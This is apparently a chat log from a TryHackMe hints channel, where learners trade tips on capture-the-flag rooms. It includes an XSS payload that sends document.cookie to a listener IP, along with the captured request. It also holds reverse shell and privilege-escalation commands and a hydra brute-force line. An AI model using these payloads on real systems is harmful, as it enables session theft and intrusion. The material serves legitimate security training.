#room-hints
Ya, looks that way, hehe. LOT of trial-and-error fuzzing to find a filename like that
maybe if you examined the source and determined the method they use to randomize, you could probably narrow the possibilities to something more manageable
might even be 'predictable' based on how they implemented things
Hashid actually is claiming it's a hash. Curious to know if it's accurate... One sec
@forest robin wrong. Giving up on this one :)
lol, try cracking the hash with fuzzing instead of a wordlist?
Hm? I know what the hash is. It's "test.txt" and I created a "wordlist" with that, but hashcat and john claim it's not a hash. hashid does. Whatever 🤷‍♂️
when you make a hash of a file, it uses the file contents not the file name
I did. Made a "wordlist.txt" and wrote "test.txt" in it
test.txt is the name of the file I uploaded
hrm..yeah echo "test.txt" | md5sum and nano test.txt (put string "test.txt" inside) then md5sum test.txt yields the same results
but that 'hash' from above is of your attachment which contains a reverse shell
so...to 'crack' it I would imagine you need to somehow put the entire contents of the attachment in a wordlist? lol not sure how this would work
Why? Doesn't the server just hash the filename into this? I would by now think like you that it's a random name, but hashid claims it's a hash.
take a look at the squirrelmail source to see what its doing?
as far as the server hashing the filename (the attachment) its more likely the contents of the file (attachment) is what is being hashed not the string that is the filename
I don't know how much I gain from this. When was the last time you saw Squirrelmail around? I just heard of it thanks to this room :-/
so if you had an attachment called test.txt that contained the string test.txt...then had another email with another attachment called test.txt and this one contained a php rev shell. The hashes would be different even though the filenames are the same...due to the difference in content
lol this is very true
But I am sure Gmail works similar :))
but! whatever squirrelmail is doing, other web based mail things could also be doing it like that?
Well, I downloaded a few web email clients that are open-source. So, hopefully I can compare.
BTW, rooting this room was a fun thing. I couldn't get it tho myself.. I looked a bit around. I found the cronjob but didn't know what to do with that.
it was a tar * thing right?
Afterwards, I saw in GTFObins related stuff
ya when I got to that point and gtfobins was no help I googled:
Yeah, that wildcard thing
But then in GTFObins in tar under sudo I found the same idea, but at the beginning didn't know how to apply that...
tar exploits
and 1st hit was: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
covers a few wildcard (*) exploits, but the tar exploit there worked for me
btw, how do you increase the number of lines to scroll in tmux? @forest robin I have a limit of 1900 or something
I changed it in the terminal settings but in tmux it did not change
in ~/.tmux.conf (which may not exist)
put this: set -g history-limit 10000
change that 10000 to whatever scrollback you want
oh, great, had a hard time with linpeas.sh
now, how do you quit pspy64 without losing the shell?
i also put this line: set -g allow-rename off
so tmux doesn't rename panes
i also remapped the default from ctrl+b to ctrl+o
as ctrl+b is among some other keyboard shortcuts for moving the cursor around in the terminal
ctrl+b to go back a char, ctrl+f to go forward a char, ctrl+a, ctrl+e to go to beginning / end respectively
alt+f, alt+b to go forward / back by word
alt+d to delete word
if you know emacs these are all emacs shortcuts
and they seem to work in all linux
does this work in a nc shell? can't move around with my cursor at all
nc shell, those shortcuts will not work
in tmux ctrl+[ to start the 'editor' ? mode has a little yellow box in the upper right corner, then you can navigate around using emacs shortcuts
And is there a way of aborting pspy64 without losing the shell?!
copy / paste from that without using mouse
you don't upgrade your shell with that whole python -c import 'pty.spawn("/bin/bash")' ctrl+z, some other stuff to do
if you do that, then ctrl+c and ctrl+l etc work fine
instead of killing the reverse shell
also try something called rlwrap
rlwrap nc -lvnp 4444, creates a more stable netcat, and things like up arrow to scroll through command history work
One sec, if I upgrade my shell, CTRL+C does not work for me, it kills my shell
great. installed now. I'll try it out next.
Sometimes the shell is telling me that "THEMES" or something not installed. Don't remember what. Occurs when running "clear"
probably something related to a config on the server
Hi all, I'm on overpass2, the last question(root flag) and am stuck. I read the hint and have looked through the pcap and the machine under james, but am missing the root back door. Any hints?
So I got it, but what does the ||-p|| flag do at ||./.suid_bash -p||, I ended up having to go to a walkthrough to get the -p and can't find what it means.
maybe opens shell as root
What man pages would I find that flag in?
I executed the || ./.suid_bash ||, but whoami was still james, only adding that -p popped me into root
And I don't understand why.
-p privileged Script runs as "suid" (caution!) Source: https://tldp.org/LDP/abs/html/options.html
There was a discussion about this not long ago here.
Hopefully, it helps.
Hello everybody, I'm working on the Scripting room, task 2, but I can't get through it. Is there somebody who could help me or give me advice?
Didn't you already ask that question 🤔?
Yes I did, but it isn't important anymore, I already found the whole code. I will copy and paste it and try to understand every line of the code
can anyone help with AoC3?
The AWS portion
What is the database password stored in Secrets Manager?
I listed the secrets
but can't find the value
the output
You have to specify the secret you want to retrieve the value from with a specific secretsmanager command.
Could not connect to the endpoint URL: "https://secretsmanager.us-north-1.amazonaws.com/"
welp
||us-north-1|| region just doesn't work for the secrets manager
it's like the region doesn't exist
Then either it doesn't exist or it's simply not the correct one
Use google to get a list of available regions
eh, task kinda misleading, found it
Mh, not sure what's misleading, but glad you found it.
Well, it's just supposed to be about cloud not gathering intelligence like the available regions
I mean if you don't know the available regions then you will have to look it up, there will nearly always be something you will have to look up, and looking up the available regions doesn't seem to be a hard task, so
true, just my lack of aws knowledge
Hi! I'm stuck at task 6 question 1 in Phishing Emails 1. Can I get a hint?
Yo @nocturne wyvern, you on task 26?
Yeeees!
Hi, in this challenge, https://tryhackme.com/room/owasptop10
In TASK 26, why do I have to run the python code to get the base64 of the reverse shell with python pickle? Why can't I just create a bash reverse shell and turn that into base64?
That's my question
@white salmon
Have you read the information provided properly? I want you to read it again and if you've got any confusion then you can hit me up later in the DMs
@nocturne wyvern
There is a reason for the exploit to be encoded
No that's fine
It's there in the instructions + the server stores it encoded, so it reads it after decoding (executes it after decoding)
That i understood
But like why use python and all that
There has to be some specific reason to use python to get the payload
Oh I got it
Because the server is python
It needs to be a python object
The string needs to be a python object ?
Read up about the pickle library and when it's dangerous. There would be no reason for it to run bash code.
No. The string is the base64 representation of a serialised python object
That python object has a method defined which you put your payload in.
The cookie is retrieved and deserialized via pickle.loads. As you can see, the code is written in Python, which means the server is also written in Python (the validation and all that), so to exploit this Python is used.
But in the python code, they are using bash to generate the reverse shell
:(
So i thought i might as well do that
The code was imported from the sys library of Python
This, how did you know that?
- You learn it through your app recon
- You're told.
But if I'm not told, would it still be possible to guess what the cookie represented?
We are using system commands to spawn a shell via Python with the help of the sys library
Alright, it seems I've got to do some reading
Perhaps, have you tried?
Usually, session cookies are just random bytes. Sometimes JWTs are used, which are signed JSON objects. If the encoded data looks to be something interesting and isn't random bytes or a JWT, it's certainly something you should poke at more.
Alright thats it
Thanks
And i'll do some reading tomorrow
Hope i understand it fully
https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html this is a good read to learn more about sessions and handling them sensibly
Website with the collection of all the cheat sheets of the project.
Can someone tell me why in Common Linux Priv Esc its saying permission denied when I write to the passwd file?
Show us what you're doing
Q5: Now, simply add that entry to the end of the /etc/passwd file
Then says permissions denied.
SHOW us, screenshots. We don't know what you're doing, so we can't possibly tell you what you're doing wrong.
hey guys, doing the retro room and trying the ||hhupd|| and I get here (attached screenshot) but it doesn't open the browser
or doesn't let me choose the browser
I am using attackbox and xfreerdp
xfreerdp /u:redacted /p:redacted /v:10.10.177.221
What is the verification code for me to hack Bookface?
I'm new to hacking, but I went to the brute force tool and didn't know what to do next
I tried to guess it but it didn't work
Can you help me?
Starting at a room/module aimed at your skill level is the best advice available in this circumstance. @graceful depot
Funnily enough, the idea is that room is an intro to THM and hacking
I'll see when I get to that room I guess.
I just did the fundamentals rooms yesterday x'D
Not sure that it's in a path
nod
AoC3 was good at showing how to use a tool before asking you to use it.
Since I've started doing the normal rooms there's a lot more "Google it".
But with guidance on what you're looking for from Google, which is as useful as knowing the concepts, but not the tools honestly. So works well for people who want to understand what they're doing.
That last bit is what hacking is all about
How do I post the command I am supposed to use without posting the answer in the chat?
You can post as a spoiler between a pair of pipes on either side || spoiled message ||
||Spoiler alert!||
ok thanks
Can someone tell me why my reverse shell from the crontab connected but I can't do any commands?
Tried it again and it worked for some reason
Hmm, interesting, connection received, but it doesn't appear to be presenting a shell.
What command/attack script are you using to open the rsh?
LOL fair.
I'm having a heck of a time with meterpreter right now. Looks like your shelless nc receive every time -_-;'
worked lol
THM struggle is real but when it works it's the best.
I use the attack box but gonna try OpenVPN soon
I hear it's better
I tried to switch to the attackbox because my VPN box is where I'm having trouble, and I couldn't get the attackbox to load x'D
I wonder if AoC3 just has the usership spiked enough that we're exceeding expected resources.
Someone tried to give me a 1month subscription code, but it didn't work.
Yeah, I'm definitely going to subscribe.
They deserve the support.
Just wanted to get some of the low hanging fruit out of the way.
So here I am fighting with Blue.
I did the DVWA app and a few other courses, but the walkthrough and explaining of things is great on THM and the content is recent.
I've got all the flags, but I can't do the darn hash crack because I can't get meterpreter running.
try another hasher?
Thinking about it. If I can't do it the way the room wants, I'll have to figure out how to push mimikatz to the box.
Can always revisit a room later on and try again.
anyone familiar with the RootMe room?
That's true, but I'm a stubborn sucker
All that fighting... I ran update && upgrade on my system, and it just bloody works when done.
I've done it a while ago. What's your question?
@white salmon Well, I seem to have a problem with getting nc to hear the request. I changed the script to both php5 and phtml, uploaded it to the panel, executed it from the uploads page, but I get an error "failed to daemonise" etc. On the attackbox it stays as listening on the port. Tried switching ports on both the AB and in the script..but to no avail.
WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111) tryhackme
Have you changed the IP in the .php script to the IP of the attacking machine?
yes sir.
Let me try it myself quickly.
changed both the IP and the port...changed the port several times
Even tho I am using a VM and not the AB.
principle is the same I'm sure
@unique oyster Should be. Let me try.
@unique oyster Just tried it and it works. Which .php script are you using?
I use https://github.com/pentestmonkey/php-reverse-shell
Did you launch the shell by visiting /uploads/yourfiles.name?
yup, that's the one I used as well. I first changed the php to php5 and uploaded successfully (after changing IP and port), then changed it to phtml. Visited uploads and clicked on myfile..then I get that error. Not sure what I am doing wrong..spent so much time on it that my box terminated. LOL
Sorry. Can't think of anything else. 🤷‍♂️ The extension does not really matter if it's php5 or phtml. Anything that does not get filtered should work.
And the nc listener is running before you clicked the reverse-shell file?
OK. I appreciate the assistance. I will have to try later today...gotta get ready to go to work. Yeah, had the nc listening before executing the code
@unique oyster OK. Have a good one.
Hi, I need more hints for room ctf100 flag 31
@white salmon well, worked perfectly this afternoon...so, IDK. But I appreciate you looking into it. Thanks.
Gave +1 Rep to @versed shadow
Hi all, I'm in relevant and have gotten the ||passwords.txt|| and decoded them. I'm looking at ||https://www.exploit-db.com/exploits/44453||, but getting all kind of blockades since this is python2, can anyone tell me if I'm heading in the right direction?
Please don't ask the same question over #room-hints and #room-help at the same time. If you want a check of direction or a sanity check then ask here. #room-help is for when you've read the writeups and still need help.
Thanks for the clarification on the intended purpose for each room, will do so in the future.
Gave +1 Rep to @stuck fractal
I'm stuck on this question from BurpSuiteBasics Task 13. Can I get a nudge? Thanks
Ah, I was dumb, didn't read the question carefully. I got it
Hi guys, having an issue with BloodHound with no database
anyone encountered the same issue?
Thanks
Found the solution to this
Hi Guys, I'm in the network room and trying to exploit SMB. I got logged in successfully but not sure how to read the files
pls someone guide me on this
You could for example try to download a specific file and then read its contents in your usual cli
Guys, what do you do when the chattr command is not found...
like I try to locate it but the only thing I get is an archive like chattr1....gz
Then I think initiate a listening port in the remote shell and then reverse shell it to my host to have access to the target to read. Is that correct?
No, you can just use the available commands from smbclient to download the file.
https://tryhackme.com/room/ccpentesting
Anyone know which wordlist to use for the last question in Task 4?
Have you read the man page??? If you have, here is a hint on what to look at: ||-x||, otherwise go read the man page
Yep I'm using -x right now
but the wordlist I'm using doesn't seem to have found anything yet
except the directory (second last question)
this is the command I'm using
I'll try the list from SecLists
bruh
one sec lemme try with .
we're only specifying extensions, why do they need a . too
hmm this was without the .
this is with the .
i think it works without the . too
maybe ¯\_(ツ)_/¯
Hey everyone, I'm in the room "The find command" and I'm stuck on Task 2, when trying to find all files whose name ends with ".xml"... I've tried: find -type f "xml", find -type f ".xml", and with "-name" as well, but I get a prompt saying that a path must precede the ".xml". Any hints please, nooby here trying to understand and learn commands
hi guys why is crontab behaving like this?
crontab is an application, you have to provide some option
@urban geyser try: find / -name "*.xml" -type f
but why does it block when you don't pass an option
it just waits expecting some option, I guess, that you didn't provide
Could someone give a hint on how to get the root.txt in ccpentesting final exam?
I'm currently SSHed into a user account
so i'm assuming I need to escalate privileges
3/4 of the links they provided for linux privileges escalation in previous tasks are scripts and there's no internet access on the box
I'm about to read through the 4th one now
havent done that one yet, but:
find -type f -perm -u=s 2>/dev/null && sudo -l && cat /etc/crontab good place to start looking for privesc
What does that do? it listed a few files for me
a problem for tomorrow, I'm gonna go rest now
I cheated
looked at a writeup, turns out it was something i overlooked earlier when i saw it in a file lol
@static gust find <where> flags
so the above command will find /=root directory -type f = only files, -perm -u=s = only suid files, 2>/dev/null redirect errors to dev null
# list files with SETUID bit set
# https://gtfobins.github.io/#+suid
find / -type f -perm -u=s 2>/dev/null
# check if you are allowed to run a command as `root` or any other user
# see how `sudoers` file/configuration works
sudo -l
# list cron jobs
# globally configured, there are `/etc/cron.*` directories as well
cat /etc/crontab
# for current user
crontab -l
those 3 commands I always do when getting a shell on a box, can sometimes privesc without having to do linpeas or other enumerations
I also like to do cd /home && find . -readable (it will show me any readable files recursively from /home)
Ah I see, thanks
earlier when I first sshed into it
I ran ls -a and saw a file called .bash_history
in it were three commands, one being sudo su
but I ignored it
you can't ignore sudo su
if you check sudo -l it shows that you can run su without password
π
why lol, that is probably the privesc
yeah it was, i later found out when i checked a write up
sudo -l
sometimes /etc/passwd and perms with suid bit set and gtfobins are the ways usually in these challenges
I tried checking /etc/passwd and /etc/shadow but had no perms
in passwd you sometimes have luck and stored hashes
Yeah I thought maybe it wanted me to try crack them
but thats how i got access to the user acc in the first place
in crontab or some other indirect read of etc shadow and then crack hashes, or just add your own root user, is easier than cracking the hashes
what room?
/ccpentesting
so you logged in as nyan ?
I have poor notes on that one, but it was very fun, I need to do it again someday
but run the linpeas it will help
but you already know the privesc path? sudo su without a password or did i misunderstand you?
Anyone else have problem with room Introduction to Django, unit 5 CTF, Hidden flag? Both flags for Admin panel and User work fine, but not the third flag. Even looked into writeups to be sure that I found the correct flag, but it is still not accepted.
Edit: Bad resolution didn't render the characters really well. Now I got the flag approved correctly.
awesome, thank you!!
Gave +1 Rep to @forest robin
Hi I've been having troubles with getting the flag for the authentication bypass room
The answer says that there is a flag in Robert's support ticket but I haven't found one there
I've also tried modifying his account details to see if I can log in but it didn't allow me to
So you talking about task 4 ?
Yes I should've specified that
So did you create an account ?
Yes
And you received the password reset mail to that account?
Yes
Can't remember correctly, but in that password reset mail, do you have to set the password for Robert's account or is the flag already in that password reset mail?
The answer says that the flag is in Robert's support ticket
Either way I've tried both
Could you show me a screen of that password reset mail/ticket you received?
And after you navigate to that url, you can set the password for Robert's account, right?
Yes
I set it and then it returned an error that there's a wrong username or pass
When trying to sign in to the account
Could you send me that link and I try it myself ? If you want me to.
Wait what ? If you terminate the machine I can't try it ^^
Ye, let me know when you are back at that point where you received the reset mail. In case it's again not working let me know, but this time don't terminate the machine
Issue might've resolved itself I don't know why but this time it worked
Alright
Thank you anyways though, I thought I was doing something wrong
Gave +1 Rep to @left thunder
Thanks! It took me a day to figure out that the smb cmd executes in binary and we need to include a filename having a space in quotes "file name". Painful
Gave +1 Rep to @left thunder
Hi, can someone gimme a hint on how to solve Q4: What is the content of the flagUSP.txt file?
please
As there are no designated channels for every room, it's always helpful/necessary to post the name of the room you are in.
I'm doing https://tryhackme.com/room/gatekeeper and I downloaded the gatekeeper.exe to analyze it locally. I have loaded it in my windows VM and into IDA64. I have found the offset for the buffer overflow but I can't debug further because the program uses a thread to handle the payload and IDA doesn't break on the bad EIP. how can I debug the program, view the memory of the thread, etc?
same with immunity. it just keeps running. it tells me about the access violation and then just keeps on going because it's a thread
well i managed it with immunity. what a slog
I'm having problems with the SSRF room task 5
My base64 encoding is displaying a flag
https://tryhackme.com/room/relevant doing this room I got the credentials of a user but IDK where to use those credentials HELP PLEASE!!!!
i am still stuck in the same situation
Hello fellow community members. I am completing the https://tryhackme.com/room/xss but got stuck on the KeyLogger section. Can't seem to make the script log the key presses on the /logs/ page. Any hints/help would be highly appreciated. Ty
Heyoo
I am stuck trying to ssh into the vm in the nmap room. Could anyone provide me the user and password for it? If there is any other way to tackle the practical answers do let me know. I have tried using ssh "tryhackme@{machine-ip}", "root@{machine-ip}" and "{machine-ip}"
ofc all in separate commands^
Link to that room?
Heya, I wanted help on the XSS room. I'm at the last task, I'm giving the correct payload, but it doesn't seem to be working
Task?
the practical questions...I am trying to connect to the virtual machine through my local machine's terminal (macOS)
task 14 to be precise
@rotund pier these?
yes
Are you trying to SSH to the AttackBox?
Hm. I don't see why would you need to SSH. Which question are you trying to answer?!
Ya, there's no need of it!
Well, I need a linux based terminal to use modules like icmp and nmap, so do I host a vbox and tackle those questions?
- True.
- Unless you have the credentials, you can not SSH to the deployed machine. And you do not have the credentials.
- Therefore, either use the AttackBox or run a Linux distro in a local Virtual Machine. Or, SSH to the AttackBox.
ok makes sense thanks
Good morning
Can someone help me with a question located on Windows Fundamentals 1 room
its this one
Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Answer format: ****** ******
Answer format: xxxxxx xxxxxx
Could you post a screenshot or alternatively provide a link to that room?
Since you are looking for just a hint, perhaps try to go to Task Bar settings by right-clicking on it and then choose "Which icons appear on the taskbar"
It's just a guess of mine.
I don't have Windows installed in front of me now, but I got the idea by looking at the room where they have a screenshot of such a menu.
I did it, but I still haven't found the answer :C
All the icons that I found don't match: battery power, keyboard language
I am sorry, I don't have Windows in front of me. Try right-clicking on them and get some more information. If you want a hint: It starts with an ||A||
found it!
Wow! How?
Thanks @white salmon!
Gave +1 Rep to @versed shadow
Doesn't matter :) Great job. Keep it coming.
Room: Madness: https://tryhackme.com/room/madness , it is not possible to connect through SSH using the credentials found. Did anyone solve this room recently to confirm if it worked lately? I have the right credentials, as I verified different writeups and it appears that I had used the correct credentials...but for some reason the machine does not accept them. Tried to restart 2-3 times but same results
Can you please add -v to your command and post the error message here?
i found the problem(a typo), thank you for your availability
Gave +1 Rep to @versed shadow
hi, is it possible to get root shell in Vulnversity room, instead of just 'cat'-ing the flag? edit: got it!
Can I get a hint for the room: "Hacking with Powershell". I'm stuck on Task 4: "Find the contents of a backup file"
I tried using this powershell command to look for all files on the C-drive that contain the word backup:
get-childitem -path C:\ -recurse -force -erroraction silentlycontinue -filter 'backup*'
also the walkthrough link in that same room isn't working
Hey, I'm doing the Jr. Penetration path's XSS room and in the last question I'm a bit stuck. The final question is: What is the value of the staff-session cookie? I'm providing the payload I'm using, which receives the cookie in the listener on my machine I've set up, and after decoding the value and posting it it still keeps saying wrong answer.
My payload is </textarea><script>fetch('http://10.14.17.24:9001?cookie=' + btoa(document.cookie) );</script>
In the listener i've got a hit
connect to [10.14.17.24] from (UNKNOWN) [10.14.17.24] 47790
GET /?cookie=c2Vzc2lvbj1jMjAwMThkYTcyM2U5NGY2OGM5M2Y4NmU4NmRjMGU0OQ== HTTP/1.1
Host: 10.14.17.24:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.40.71/
Origin: http://10.10.40.71
Connection: keep-alive
that cookie decodes to session=c20018da723e94f68c93f86e86dc0e49
and i still get "Uh-oh! Your answer is incorrect."
I'm doing that room just now
i hope it works for you
room is very well explained
but i keep hitting the wall with that final question
Nah, I can't find the second passphrase.
I'm stuck on one of the learning rooms. I'm doing question "[Severity 8] Insecure Deserialization" in https://tryhackme.com/room/owasptop10, but I have no clue whatsoever where I should find the name.
Could you specify which question
I'm guessing you are looking for who developed tomcat?
would that be it? It says "The tomcat application", so I'm assuming that the box you can deploy is a tomcat application.
I can try that. Hold on.
You know you can google stuff right?
This is a research question
The question is formulated weirdly, and there is a box.
I assume that's for the tasks below
Just search "who developed the tomcat application" and your answers will be in bold on the top of your page
Yeah I guess I shouldn't have assumed that it wasn't that simple.
My bad )
Yeah I already know the answer now, just didn't figure it would be that.
Thanks though.
Starting to wonder how long I should be waiting with Crack the hash, Level 2, hash 3... Anyone done this one?
I don't remember how long this took me, but I read once that as a rule for devs of rooms, it should not take more than 5 minutes.
20 min and counting... Time for some Halo.
If it takes more than 5 min with rockyou.txt you are probably doing it wrong
John or hashcat?
hashcat
-m ???
1hr and 11 min.
-m 1800... gonna run it on my desktop and see how long it takes. Probably my anemic laptop
running hashcat in VM?
hashcat can work faster with the help of a gpu too
I see the issue now, and it's a major off topic answer. Apple and their EFI issues make the GPU inaccessible to me.
@quick nimbus But good to know :) @alpine kestrel
I'm trying to run metasploit for the ToolsRUs room
I'm deploying an exploit
but a session isn't generating
I ensured my HttpPassword, User, Rport, and rhost are set correctly
Then I run the exploit
Then I get a message saying "Exploit completed but no session was created"
Solved it meanwhile ?
Verify your THM profile and you'll be able to post screens in here.
!docs verify
Hey guys, I was doing the Phishing Emails 1 room in tryhackme. I am not able to decode the base64 email2.txt file, maybe I am copy pasting the wrong data, can anyone help me?
Which task are you on?
Look at the format of the file name
not the actual .txt but inside of the .txt file
Just a little update from yesterday. Got Nvidia Cuda tools installed on my windows box, and ran hashcat there. 71min on the craptop vs 32 seconds on the desktop.
"What hash format are modern Windows login passwords stored in?"
I don't quite understand this question
I wrote an NT or LM hash and it gave incorrect
LM -> NTLM -> NTLMv2
It's worth understanding the differences because they make defense and penetration very different.
ohh
thanks
Anyone doing MLSC CTF? I want a hint on the 3rd task, since I found something that looks like the flag format while researching, but the string I found ain't a valid one to complete the task..
May I ask how to make pickle work? Because I've downloaded the pickle files and I have only this, I don't understand how to configure it for OWASP top 10
I think you downloaded the wrong stuff. The actual code for that task is on the github page when you click on the revision tab and scroll down a bit. It's not intended to be like that, but at least you can find it there.
But I've clicked on the OWASP top 10 link directly for the pickle file...
why I got something else
https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3 I found this on GitHub, nothing else, when I click on the link they said to click
sorry wrong link
this is what I've modified
As I said, follow the link in the room, then click on the "revisions" tab and scroll down a bit
Yes
ok good, it works now, I was so confused
thx
Gave +1 Rep to @left thunder
I finished that room last night, it's a good room.
I did find a flag I can't put anywhere in the room, so I wonder if the website is used for a different room task.
I tried asking Ben, but he's never around.
Which site of that room you mean, the juice shop ?
In case the juice shop is even in there ^^
Nah, it was the website where you used the cookies to log in as admin.
With the message from Tony the Tiger.
^ That's the one I was asking.
Oh sorry xD
I got that flag, couldn't find an input, so I was wondering if it was scrapped or goes elsewhere.
@inland cargo ok I give up
can you give me a hint for Pickle Rick
I've got the username
just don't know where to go with it next
tried ||ssh but it showed I need a public key||
Haha one sec, share me the room link
Okay great, can you show me the command you used for your nmap scan?
nmap -sV [ip]
Okay and which ports were open?
||80 and 22||
Lets try this nmap -sCV -T4 $IP -p 22,80
Hmm okay and did you do a dirbuster scan?
i tried gobuster
using dirbuster/directory-list-1.0.txt word list
found ||/assets||
And what extensions were you looking for?
oh i was only checking directories with that command, i also tried using /dirb/common.txt for .pub files
I normally add html,txt,php if it's running php.
hmm I'll try those and let you know if i find anything
ah found something
thank you
found a ||login.php|| i'll try this on my own
@inland cargo oh one more thing, is there a way to load rockyou into burpsuite without it crashing lol
or maybe i should try hydra, iirc it can do post requests too
Ye I don't use burp for bruteforcing
Also you want to look for files too, just not dirs 
i tried for .pub cause i saw ssh required a public key
but i didnt think about php and other files
@inland cargo Could you let me know if the following syntax is correct?
I'd rather not wait 78 hours of bruteforcing with rockyou to find out
||hydra -l $USERNAME -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php/:username=^USER^&password=^PASS^&sub=Login:S=Incorrect"||
Okay, you tried bruteforcing, let's go back to enum.
Have you tried nikto?
im bruteforcing atm
7 minutes in
no
7+ minutes in
not sure exactly how long its been
15 mins*
tried 185k passes so far
i'll try that now
Bruteforcing is not that path forward
Yup
okay, running rn
still running hydra for now just in case, i'll stop it at 20 mins or smth
might try sqlmap next on the login page
nikto didnt seem to find anything new
sqlmap didnt find anything either
simply did sqlmap -u [ip] --forms
think i might just give up on this one and go for an easier one, probably toolsrus
and come back to it when im more experienced
Did you add the extensions like I asked?
Yup
You still need a pass, you tried bruteforcing but that's not the way
seems so
gobuster dir -u ip -w /usr/share/wordlists/dirb/common.txt -x html,txt,php
And the gobuster output?
||/.hta (Status: 403) [Size: 291]
/.hta.html (Status: 403) [Size: 296]
/.hta.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 296]
/.hta.php (Status: 403) [Size: 295]
/.htpasswd.php (Status: 403) [Size: 300]
/.htaccess.html (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess.txt (Status: 403) [Size: 300]
/.htpasswd.html (Status: 403) [Size: 301]
/.htaccess.php (Status: 403) [Size: 300]
/.htpasswd.txt (Status: 403) [Size: 300]
/assets (Status: 301) [Size: 313] [--> http://10.10.38.210/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 300]||
robots.txt
Should always check that out for a web server.
S=Incorrect seems wrong to me, you're indicating that "Incorrect" should appear in the event of a Success...
room dev rules state that any bruteforcing should take no more than 5 minutes on the attackbox
Ah I see
oops
make sure you get the case right
odd, s=incorrect should have found it on the first pass then
it's bloody finicky
crap i broke it
happens
glhf
hey, can someone please help me with phishing email 1?
i decoded the text but i cannot find a flag
nevermind
Can I pm someone about the third flag (binary exploit) on theseus? I have it working locally but I'm having trouble getting it to work on labyrinth. even set up a tunnel to run pwntools 'locally' on the machine and it's still not working.
I can try to help if youre down
I literally just got it working after many hours of frustration. Thank you though!
Gave +1 Rep to @terse eagle
can I DM you for some help with the room? haha
Sure thing
If it's the th**** binary you don't have to use binex to get past this!
Wait really, I ended up doing binexp, mind pmming me? Would be curious to know what the other routes were
Sure, PM if you want.
Hello there. For a school project I have to do some "basic" hacks on a website. After using nmap on the site to check open ports, I found 3 different ports which all give me an auth request with a username and password that I don't have, obviously. Any tips?
So it's not for a room on THM ?
sounds sus
it is but on a secret room I guess
So what's the link to that room ?
Hmm, hard to tell if it's really for a "school project" or for something else ^^ .. So dunno.
It is, I can prove you in PM if you want
Sure why not, I'm happy to help if it's for a legit purpose
having issue with john
trying to crack simple LM hash
john --show jon_hash
Jon::1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
1 password hash cracked, 0 left
I use rockyou and as the hint says, the pass is in there
question is why john fools me that he cracked it
john --wordlist=/usr/share/wordlists/rockyou.txt --format=LM jon_hash
try cracking just the hashes without the colons and all that
like aad3b435b51404eeaad3b435b51404ee
ffb43f0de35be4d9917ac0cc8ad57f8d
root@kali:/home/nism0/THM# cat jon_hash
aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d
root@kali:/home/nism0/THM# rm ~/.john/john.pot
root@kali:/home/nism0/THM# john --wordlist=/usr/share/wordlists/rockyou.txt --format=LM jon_hash
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-01-03 15:23) 0g/s 9990Kp/s 9990Kc/s 19980KC/s !!1QWER..*7¡VA
Session completed.
root@kali:/home/nism0/THM# john --show jon_hash
0 password hashes cracked, 2 left
root@kali:/home/nism0/THM#
btw - afair john had no such issues before with that format
like here
Although projects like Hashcat have grown in popularity, John the Ripper still has its place for cracking passwords. One of the advantages…
I meant crack individual hashes
not combined with :
anywho ||hashcat -m 1000 -a 0 ffb43f0de35be4d9917ac0cc8ad57f8d rockyou.txt|| should do the trick
frankly, I prefer hashcat over john, but I'm on vm at work so no hashcat here
yup. I did full upgrade last time so maybe it broke john somehow
thanks anyway
I'll keep digging
that's exactly what give me my john
however, this seems not to be the right answer
yeh just cracked it on https://crackstation.net/
Crackstation is the most effective hash cracking service. We crack: MD5, SHA1, SHA2, WPA, and much more...
only the latter part gives a valid answer ffb43f0de35be4d9917ac0cc8ad57f8d
No problem, it was fun!
Did anyone complete the room Phishing Emails 1??
I'm stuck at the first question of task 6 and I have no idea
Got it from different room
hi i dont understand task 7 linux fundamentals part 1
what have you tried????
Or what don't you understand about it
i dont understand the whole task
They are operators that you can use in a terminal along with your commands to achieve different things
Think of it as in the English language
There are sentences(commands) which communicate your ideas
And then there are symbols like , or ; which can join those different sentences (operators)
For example I could say I walked, then I ran
Which would be the code equivalent of echo 'hello' > Textfile.txt
ah i understand
Anyone solve CCT2019 Task4?
is that the openvpn room, or are you asking about running openvpn?
heh, figured it out?
so, yeah, i normally have openvpn running in one tab on my terminal, and then do stuff in other tabs
so, presuming you're on linux you run "sudo openvpn thisisyouropenvpnfilename.ovpn"
not on linux
i am on windwows
windowsd
windows
sorry for my impatience
i realise im annoying
ah ok, i'd recommend you try downloading virtualbox and get a kali vm running in it. it'll make your life easier going forwards
any tutorial u know of?
like where do i learn how to do that stuff
khalas nvm
ill search it
sorry for bothering u
have a goodday
ciao
I had problems realizing what openvpn does as well, at the core when you start a room it will let you visit the IP on your active machine and do the task from there
And then you would use your own computer to do the task rather than open up an attack box each time
wdym by 'at the core'
Basically
but i dont get it
What don't you get about it?
i have openvpn openned ok?
i imported th.ovpn file
and connected it
i started the machine on the website
then
it asked me to try linux commands on my end
and i cant access the terminal
and idk why
Oh for that you need your own virtual machine with a Linux system
Because it's a different operating system with different commands
How much RAM do you have?
Hey hey, I am currently doing Network Service 2 and Task 4 is not quite working for me. I get an error when doing ./bash -p
